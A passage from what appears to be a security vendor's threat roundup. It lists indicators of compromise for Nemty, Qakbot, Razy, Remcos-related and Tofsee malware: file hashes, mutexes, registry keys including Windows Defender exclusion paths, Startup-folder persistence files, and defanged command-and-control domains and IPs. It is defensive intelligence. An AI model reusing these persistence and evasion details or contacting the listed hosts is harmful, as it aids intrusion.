\n`%HOMEPATH%\\Favorites\\NEMTY_GBF756G-DECRYPT.txt` | 1 \n`%HOMEPATH%\\Links\\NEMTY_GBF756G-DECRYPT.txt` | 1 \n`%HOMEPATH%\\NEMTY_GBF756G-DECRYPT.txt` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0b02eb48cb0b7e88d3c5c6d6b6366dedc8d29f13e8ef252d768ce5f0acf3e6b7 2d2c2363a77afa2a914cf77e684cd279150bef2e5f5c27ba45e2be26b094d6e9 31145485a77c5167d0b01834793203c7f03e4298e532712773700f853bf494d5 4ed113b1e3967eea8beec9ac8b23017a25938dda53822c51c21d30c71a946660 53279dd8f9c45b2e213d4925c5a59cc0297a3446d566cb4eb2825b5042d912a9 7475233e2a3836d3a8b69fc76450cda8770beb5e61da095fb108898ef9bca0fb 7f944fc983d8100caf59f4918239e6d83f0cb2a498ea3f48e8623b3cebcc3250 944006ef7abb2e02f87ddafd0e50f8e3c600d3914462d6216027f5c5dd8db475 9f2a258a72368901ac1f99e7d0eadf62a85a2d33c56d3dca3d1406244dd0713a a30e02134af6767d48793d1ac857d428b11380fa6c2f4898918b1b3ed2012700 a969b88015cf14ae1b50cc903e82b75d754deddbca2a2bb1a39db4c6cf447c12 a9f6d5ad40d5b073be92fc46666ce1f96e30c50494a018d472cfee56ff2b8c65 cbe96c19bc6246b4c85242e87b74481be23ac7bebe61aea6b34ff7deb8f17275 d74cc221d6ab6e29b7049ab7f49a6ac80c9cde20ca7f4db31e128037f1bf9d4d dba02f5167986887ab29070b468c15bbc15d79942d62c8f9bcf95546c461d128 f15065bb9747e1c9a7f2bb41e80efdc2ef0435ac1f5b649d11c7537fa9095eba `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-UWzSCz2Srx0/XlASAKow2II/AAAAAAAADUo/fJipPUI6b0g0c8ZY6ZsizUtAw9MWTWZ8ACLcBGAsYHQ/s1600/0b02eb48cb0b7e88d3c5c6d6b6366dedc8d29f13e8ef252d768ce5f0acf3e6b7_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-1Jo16dCDs10/XlASDXotNNI/AAAAAAAADUs/aw-ynvd2dRoijKqRKfAqB9xav0JR4QA-gCLcBGAsYHQ/s1600/0b02eb48cb0b7e88d3c5c6d6b6366dedc8d29f13e8ef252d768ce5f0acf3e6b7_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-AoxHQu44ypg/XlASGwV2AtI/AAAAAAAADUw/VrIUSZTMrzcEseWsPU2SwDovyfXw066FQCLcBGAsYHQ/s1600/0b02eb48cb0b7e88d3c5c6d6b6366dedc8d29f13e8ef252d768ce5f0acf3e6b7_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Qakbot-7586710-1\n\n#### Indicators of Compromise\n\n * IOCs collected from dynamic analysis of 17 samples\nMutexes | Occurrences \n---|--- \n`ocmwn` | 17 \nFiles and or directories created | Occurrences \n---|--- \n`\\TEMP\\7dcd176143285b60a9dda1499593d0e2.exe` | 1 \n`\\TEMP\\7119a1ba9e8866f9aca5360c337aa099.exe` | 1 \n`\\TEMP\\8d6ac636eb8758ef5c1820e457f6f4c3.exe` | 1 \n \n#### File Hashes\n\n` 16e98279914ef3280950a2cba389e0aced7bc38d45db4f4e3b516bab17de41b2 2194ff71108712b66905dc46155aada3b0c5e56986e7db97f50b1dc5055aa41f 279be64e1b80827ebc2187f76914b57d8ce6fc14aa70ee908c8e29c1a6177f8a 2b8c204a35189a6937aa9740820a4ac6caf7ca372656d20d8bfc9f8583f02081 3cb499f2bb1838ad8066bae7254fa012a2b7ba4270ae284774537093898beda2 44b234565a5590957845f1c4e14e7c81ab5be8a9ae0d19a1f4e04ebcf67be907 46ab34a52c0e0f8a6cfb302d38085924f55e7a0d37c5bf8cd6b503ea83a2055e 58225241e8f436355e2cc739127490ad8a88d6d47620c727a26e56c5c1e786e0 5afa22c50fd430fed4f06437dcdb74248bc40917dd6a4f4844137528ae186aaa 8c17ae11559298aa36b6837b9e6a2f4fcee5a083004ea6463aa9384c04d016f3 abe179259e363dad7ab393685c3dd711550a9f8aa7fe5344de8141723352b0de b053b3570129f906cf09d2a63d034f724fd3d561d991fec761133c1cfe568ef6 b8a80038ab33b7a556f3b1e47cadfddc417d7301ee62c0a87610ab635e60360a bf052b65100259f2a13c98a20aad8f8bd8688a07639530aa12159200fb39c504 d6b4f5ce244ce922fbed636528ad6deb7ca306f543400657b5e07dc0ffd6521f db037e58c1bc214b4853bff0aedd8ba22a5ab60e37b127178fb36547b2124051 dc01374a8e4b46e82f3efc130065b8e7a93bdb537ece13e02ac303a881b138ac `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-4o9mTNwWLmA/XlASV1IC1wI/AAAAAAAADU8/533byX6vO1I7xOlnlgSryN9s9Ojtb1D7ACLcBGAsYHQ/s1600/279be64e1b80827ebc2187f76914b57d8ce6fc14aa70ee908c8e29c1a6177f8a_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-FGrkAdr1_Ac/XlASZuJEl4I/AAAAAAAADVE/vY-ngbrNagsZ47DblO6CVDXyMJXJfyemACLcBGAsYHQ/s1600/279be64e1b80827ebc2187f76914b57d8ce6fc14aa70ee908c8e29c1a6177f8a_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Razy-7588195-0\n\n#### Indicators of Compromise\n\n * IOCs collected from dynamic analysis of 54 samples\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\TOOLBAR \nValue Name: Locked ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\HOMEGROUP\\UISTATUSCACHE \nValue Name: OnlyMember ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER \nValue Name: CleanShutdown ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{509D0DCA-5840-11E6-A51E-806E6F6E6963} \nValue Name: Generation ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{6DD1DC5F-5840-11E6-B80E-00501E3AE7B5} \nValue Name: Data ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{6DD1DC5F-5840-11E6-B80E-00501E3AE7B5} \nValue Name: Generation ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA63-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Data ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA63-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Generation ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Data ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Generation ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APPLETS\\SYSTRAY \nValue Name: Services ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\NLASVC\\PARAMETERS\\INTERNET\\MANUALPROXIES ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\CD BURNING\\DRIVES\\VOLUME{509D0DCA-5840-11E6-A51E-806E6F6E6963} \nValue Name: Drive Type ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\CD BURNING\\DRIVES\\VOLUME{509D0DCA-5840-11E6-A51E-806E6F6E6963} \nValue Name: IsImapiDataBurnSupported ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\CD BURNING\\STAGINGINFO\\VOLUME{509D0DCA-5840-11E6-A51E-806E6F6E6963} \nValue Name: DriveNumber ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\CD BURNING\\STAGINGINFO\\VOLUME{509D0DCA-5840-11E6-A51E-806E6F6E6963} \nValue Name: StagingPath ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\CD BURNING\\STAGINGINFO\\VOLUME{509D0DCA-5840-11E6-A51E-806E6F6E6963} \nValue Name: Active ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\CD BURNING \nValue Name: CD Recorder Drive ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\CD BURNING\\DRIVES\\VOLUME{509D0DCA-5840-11E6-A51E-806E6F6E6963}\\CURRENT MEDIA \nValue Name: FreeBytes ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\CD BURNING\\DRIVES\\VOLUME{509D0DCA-5840-11E6-A51E-806E6F6E6963}\\CURRENT MEDIA \nValue Name: Blank Disc ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\CD BURNING\\DRIVES\\VOLUME{509D0DCA-5840-11E6-A51E-806E6F6E6963}\\CURRENT MEDIA \nValue Name: Can Close ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\CD BURNING\\DRIVES\\VOLUME{509D0DCA-5840-11E6-A51E-806E6F6E6963}\\CURRENT MEDIA \nValue Name: Live FS ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\CD BURNING\\DRIVES\\VOLUME{509D0DCA-5840-11E6-A51E-806E6F6E6963}\\CURRENT MEDIA \nValue Name: Disc Label ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\CD BURNING\\DRIVES\\VOLUME{509D0DCA-5840-11E6-A51E-806E6F6E6963}\\CURRENT MEDIA \nValue Name: Set ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\HOMEGROUP\\UISTATUSCACHE \nValue Name: UIStatus ` | 1 \nMutexes | Occurrences \n---|--- \n`B4BBD0F7883AF46401A8F944D11D8E1698B68E3C` | 40 \n`Global\\<random guid>` | 7 \n`opera_shared_counter64` | 2 \n`opera_shared_counter` | 2 \n`<32 random hex characters>` | 2 \n`{C20CD437-BA6D-4ebb-B190-70B43DE3B0F3}` | 1 \n`` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`104[.]129[.]67[.]170` | 22 \n`104[.]129[.]67[.]168` | 18 \n`72[.]22[.]185[.]198/31` | 2 \n`185[.]53[.]179[.]7` | 1 \n`185[.]222[.]202[.]91` | 1 \n`62[.]149[.]210[.]9` | 1 \n`185[.]35[.]137[.]147` | 1 \n`185[.]61[.]148[.]224` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]msftncsi[.]com` | 40 \n`ligue1[.]shop` | 2 \n`klub11n[.]us` | 2 \n`jong37[.]pw` | 2 \n`klub046[.]co` | 2 \n`ijust1fy[.]pw` | 2 \n`ktfr34ks[.]pw` | 2 \n`son0fman[.]pw` | 2 \n`jsbook[.]info` | 2 \n`js0c892[.]se` | 2 \n`iyfsearch[.]com` | 1 \n`ligue1[.]fun` | 1 \n`www[.]mac-pro[.]it` | 1 \n`j5cool[.]xyz` | 1 \n`sm0osh[.]xyz` | 1 \n`jo1b9[.]co` | 1 \n`lip616[.]co` | 1 \n`lip4u5[.]se` | 1 \n`jsoc8492[.]us` | 1 \n`jo15y[.]xyz` | 1 \n`l0vew1n5[.]xyz` | 1 \n`snd616[.]co` | 1 \n`dill10n1[.]pw` | 1 \n`j0011y[.]pw` | 1 \n`j0nhy[.]pw` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\sessuawh.lnk` | 40 \n`%APPDATA%\\Microsoft\\Windows\\sessuawh` | 40 \n`%APPDATA%\\Microsoft\\Windows\\sessuawh\\jisgivdt.exe` | 40 \n`%System32%\\Tasks\\Opera scheduled Autoupdate 3131961357` | 4 \n`%System32%\\Tasks\\Opera scheduled Autoupdate 3115184141` | 4 \n`%System32%\\Tasks\\Opera scheduled Autoupdate 2980966669` | 4 \n`%System32%\\Tasks\\Opera scheduled Autoupdate 3130913037` | 3 \n`%System32%\\Tasks\\Opera scheduled Autoupdate 3130912781` | 3 \n`%System32%\\Tasks\\Opera scheduled Autoupdate 3131961405` | 2 \n`%APPDATA%\\Microsoft\\Windows\\sessuawh\\sessuawh` | 2 \n`%System32%\\Tasks\\Opera scheduled Autoupdate 3004035085` | 2 \n`%System32%\\Tasks\\Opera scheduled Autoupdate 3131109389` | 2 \n`%System32%\\Tasks\\Opera scheduled Autoupdate 3131962125` | 2 \n`%System32%\\Tasks\\Opera scheduled Autoupdate 3131961349` | 2 \n`%System32%\\Tasks\\Opera scheduled Autoupdate 3127767149` | 2 \n`%System32%\\Tasks\\Opera scheduled Autoupdate 3007180813` | 2 \n`%TEMP%\\7CE0.dmp` | 1 \n`%TEMP%\\WPDNSE` | 1 \n`%LOCALAPPDATA%\\Microsoft\\Windows\\WER\\ERC\\statecache.lock` | 1 \n`%System32%\\Tasks\\Opera scheduled Autoupdate 2989355021` | 1 \n`%System32%\\Tasks\\Opera scheduled Autoupdate 1044487932` | 1 \n`%System32%\\Tasks\\Opera scheduled Autoupdate 3131961552` | 1 \n`%System32%\\Tasks\\Opera scheduled Autoupdate 3131963261` | 1 \n`%System32%\\Tasks\\Opera scheduled Autoupdate 2980966925` | 1 \n`%System32%\\Tasks\\Opera scheduled Autoupdate 2989726024` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 002f27cf7d9185bd0c0ee1c363a221be80e797db81f25e1abb9898de6906c6b6 00de50e39e76fe23df42f435dfe0c0571b41c06a4337f15dc0c70ef28182c332 03759da14ffcd558e1b492286a1f04cce519995b591a848ee4e76b1a00f9bfbd 038a84e68adbb095a8ad39ced3de6407f977113fee99c46c6e87dc7c2c66d739 070ef4de5fe79fe29dfb5d3db253ec2c4b6e20797116b608cbbadb110afc54d1 07ed129012419a5c63e2987883653f7781ccc214f2abe3580b3baac5df397b88 08f442c4d7bcbbfbed9cf39ed382529fdb1368f2cd8e8d88d39a987b566b705a 096add794410c4bc72ef29cebfba05db27ca895f9136eba710cf45ad3492e37d 0c260a56652727b6dd9e280cb741870e61b9c1a8fe54dad0e12b42b2163eb391 0ec389eaa5253a5477aff5a36b5af41a76430cc41a4231dba9dab9587650e36b 11c15bc5878e34eb98b320aa9d7dbe6fb71987603cec86d39c1d7a902e3b5eef 198501a9810da38bb19dc1e0f4dd3a669a86fa57165075485cebf6e7662600e7 1ac2a34d85e02dc74dc1f612d06634d160fd29e359d45b8a50ccc3bbd78c3975 20dd29c3c7271b2d44600e7896dc3e351e8d53b583f9535104fe9cca3077d219 21633fd3deaa6b4a8bb9095f3d396c894a0a8648edbd85919d4589068327c3b0 2c6a0eb320df561009681342b3ccb1dd8a585968ec0932716553389f19d0b620 2fa0184c94b5220ec52d03e99eaa43b00ee78ef956f4c3a5b09bb7dca8270f47 3563013bf168f3021b42950648dd8175e51baeea1f9b6f1a9c8dfe2fb28b0187 383dede6a6d363e97a2d34a002aca69378da4b6769b13976b0344a20272a7d9d 3d51cff2d7fe5c108b765525081c3c0ec62811d6fd8f6d1e8f7ccb23ce1b5160 40c184b47b2d4d52ab39aab7c81b9e80b85948e6321989eed2e071a2346c836e 41e87e94d52d08cd7d82e052a72b598421dbd469d676cfb58640521a15ec0eed 533418f5d648f0a9855adbea0b6001531d8ea6687db27e1ddc0a157174cbc605 560df0484842e569cf4ec7a3c9b6942fbab8a5e5ef1bf8516baa6317841aa4bf 586303e0a91cd70a44b2311a081462b396f0e57cd948edf0fa97a4896eb830a4 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-QzeeOF7y_s8/XlAVZtosioI/AAAAAAAADVQ/uAsSM7h5iC0uJ28blJbVHgifsZcECTuegCLcBGAsYHQ/s1600/383dede6a6d363e97a2d34a002aca69378da4b6769b13976b0344a20272a7d9d_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-mZg_D4XEh-o/XlAVc8KNJfI/AAAAAAAADVU/4Il6PjInA34KEsOQT76GckMI47dkyaOawCLcBGAsYHQ/s1600/383dede6a6d363e97a2d34a002aca69378da4b6769b13976b0344a20272a7d9d_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-KTXDpx3Enwk/XlAVjC8EmpI/AAAAAAAADVY/2tZKt67yb1IvszgN6qoG6PstQeGMGdSxgCLcBGAsYHQ/s1600/ec64f644457a610df9de78b5b27074a8652a163a4ef5917157f889baeee69fd6_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Generickdz-7586813-0\n\n#### Indicators of Compromise\n\n * IOCs collected from dynamic analysis of 37 samples\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\REMCOS-ZUXZLQ ` | 4 \n`<HKCU>\\SOFTWARE\\REMCOS-ZUXZLQ \nValue Name: licence ` | 4 \n`<HKCU>\\SOFTWARE\\REMCOS-ZUXZLQ \nValue Name: exepath ` | 4 \n`<HKCU>\\SOFTWARE\\REMCOS-V1R5VH ` | 2 \n`<HKCU>\\SOFTWARE\\REMCOS-V1R5VH \nValue Name: exepath ` | 2 \n`<HKCU>\\SOFTWARE\\REMCOS-V1R5VH \nValue Name: licence ` | 2 \n`<HKCU>\\SOFTWARE\\REMCOS-6PU1BX ` | 1 \n`<HKCU>\\SOFTWARE\\REMCOS-6PU1BX \nValue Name: exepath ` | 1 \n`<HKCU>\\SOFTWARE\\REMCOS-6PU1BX \nValue Name: licence ` | 1 \nMutexes | Occurrences \n---|--- \n`QSR_MUTEX_ayVRCIIhAhYn6ZIdtI` | 17 \n`Remcos_Mutex_Inj` | 7 \n`Remcos-ZUXZLQ` | 4 \n`3749282D282E1E80C56CAE5A` | 2 \n`Global\\{b1324b26-be01-4620-bf4b-b68b0ae0f95b}` | 2 \n`Remcos-V1R5VH` | 2 \n`57926c4f-8f06-4a2d-a8d5-a3428f4894fd` | 1 \n`Global\\8e50a541-4f19-11ea-a007-00501e3ae7b5` | 1 \n`Remcos-6PU1BX` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`208[.]95[.]112[.]1` | 17 \n`46[.]105[.]98[.]53` | 17 \n`79[.]134[.]225[.]123` | 2 \n`209[.]127[.]19[.]34` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ip-api[.]com` | 17 \n`variakeburne[.]ddns[.]net` | 4 \n`randydidier2468[.]ddns[.]net` | 2 \n`renaj2[.]ddns[.]net` | 2 \n`worldatdoor[.]in` | 1 \n`kitchenraja[.]in` | 1 \n`sixteen147[.]ddns[.]net` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Logs` | 17 \n`%APPDATA%\\Microsoft\\System32.exe` | 17 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\System32.vbs` | 17 \n`%APPDATA%\\Logs\\02-14-2020` | 17 \n`%APPDATA%\\<random, matching '[a-z0-9]{3,7}'>` | 13 \n`%APPDATA%\\remcos\\logs.dat` | 7 \n`%TEMP%\\96f91905-b339-4638-bd86-c6a77cf058d3` | 4 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\appsdatas.exe.vbs` | 4 \n`%APPDATA%\\appsdatas` | 4 \n`%APPDATA%\\appsdatas\\appsdatas.exe.exe` | 4 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\yfgr.exe.vbs` | 4 \n`%APPDATA%\\jnxc\\yfgr.exe.exe` | 4 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\lmwq.exe.vbs` | 3 \n`%APPDATA%\\hcek\\lmwq.exe.exe` | 3 \n`%APPDATA%\\D282E1\\1E80C5.lck` | 2 \n`%APPDATA%\\Microsoft\\Crypto\\RSA\\S-1-5-21-2580483871-590521980-3826313501-500\\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5` | 2 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5` | 2 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\Logs` | 2 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\Logs\\Administrator` | 2 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\run.dat` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\daxp.exe.vbs` | 2 \n`%APPDATA%\\gnwk\\daxp.exe.exe` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.vbs` | 1 \n`%APPDATA%\\appdata\\update.exe` | 1 \n`%TEMP%\\637172179772244000_d1934800-c529-4e3b-afff-37bcc71b45d4.db` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 08ce5d7fc0de04906c1c24dc0d72d279dbd125b61d4ff3361e5f960d3441e421 0a603c32a8e16c81e314e9030a6e6d45055ae5f93ca819121ba6538660fe3072 0c4b27461dbd294c5a6a3851051ab5ff3ecf6b6aa72b7588ba59a7381632f06e 12a2568481ee9eca1ccb7a522f5853a7b0aa30ed56abfa5d3f1a2168865f390a 13ac030d6a53c594e08ffb80140b43fcad93841e170be5d8043e9f4b1512ea7e 1514b3e4e3c01eae8d55693255f12c5efd68549491c007425b6cac2465ec07b2 16a94d5de704b8166684143480c0c93c522751eba3acc8a79d468d0e7b579a9e 17309647cddb67ae9146b2746461e0152240808f88231c790dfcf923a7b717a2 1fbc7923dbc28f31aed3114f6ae66cd7431b78639b0998af963f606dd430dd41 1fde04dd38b0e62c6e39c9cf83d946052d665ab43be1aad712c665d4f216becf 2766c878553e8b7fae74b133be1880b6a345ade8284d919717d0ca6427e85a38 2ae7fe445fcc08eb3179519a41aea3fb7310e33973af114efd17dfa8653cbc5d 2b70abdaf78867285774c432c365ad6a7ab5777f0eda50d9c202205fcfe576d5 30b44cab6a839ae845647b0d608f645cc44bf01af6d5a9b53aae92e46bc12159 312915777632ef010f7a3bb2c60c274ea7c6d3f195349efac5e1057f6ec8a46a 3328f4ca20a50c85d8ddb77e20b54822bb44c7fc7dfbaab279fcf39389a50355 35ed04364daa9a21e306204ea27f1d7186248a8ab6bbc03ab202fb8d6f998a05 38f23b5da8cba1044efabbf1bbdb29d0fc748206ff5709a9c8c0fc553c21418c 3e50718cfffca7db327d35011301206ce21a7103f6a68bd78859a666e5781f42 4124aa54761859ab9d92cb3d50a64e461c5fe76b70b0839e933117fdb91391f0 48a1f2cf546a630bc763375052b734d4d1bd8d121e440a1718ec2c09d1605f57 4b388553f1b23e229fed441a7ada1afd2a87dfb1e77dc43d86f86b4028c2d46a 553e69e62475f74dcf2762e5499167539ae77df7692f0967cc1f9408d0bd8ae4 557e52d63114622d6adec38238bdf81d944d66389b07ddbe542fb8799b8d0b3e 5d3a4d8448e8af881bb3f82ed0d34735491c076c7c7f1f642431ec2777f4dec9 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-1cZLfIv8gHk/XlAWPwqHT9I/AAAAAAAADVo/oHcV78z8ePMREWOuTNdzyHP-z3NqmFQQACLcBGAsYHQ/s1600/30b44cab6a839ae845647b0d608f645cc44bf01af6d5a9b53aae92e46bc12159_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-a4Y0P4O5X6U/XlAWUT53BJI/AAAAAAAADVs/iEInF4WtvXgAr0_uAfvnFHm9W0SIp7hUQCLcBGAsYHQ/s1600/d21da138cac8528e6e2160b8ea8b56749c0d5300994af27283f238c8a46607c8_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-bO0MXTuuCbM/XlAWZ7YOyfI/AAAAAAAADVw/dt7PgqGhwnILvQc4m50G23tEDjasMNByQCLcBGAsYHQ/s1600/35ed04364daa9a21e306204ea27f1d7186248a8ab6bbc03ab202fb8d6f998a05_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Tofsee-7586819-1\n\n#### Indicators of Compromise\n\n * IOCs collected from dynamic analysis of 18 samples\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 18 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config0 ` | 18 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config1 ` | 18 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config3 ` | 17 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config2 ` | 17 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ImagePath ` | 13 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\haoutbhw ` | 3 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\fymsrzfu ` | 3 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\nguazhnc ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\unbhgouj ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\ibpvucix ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS 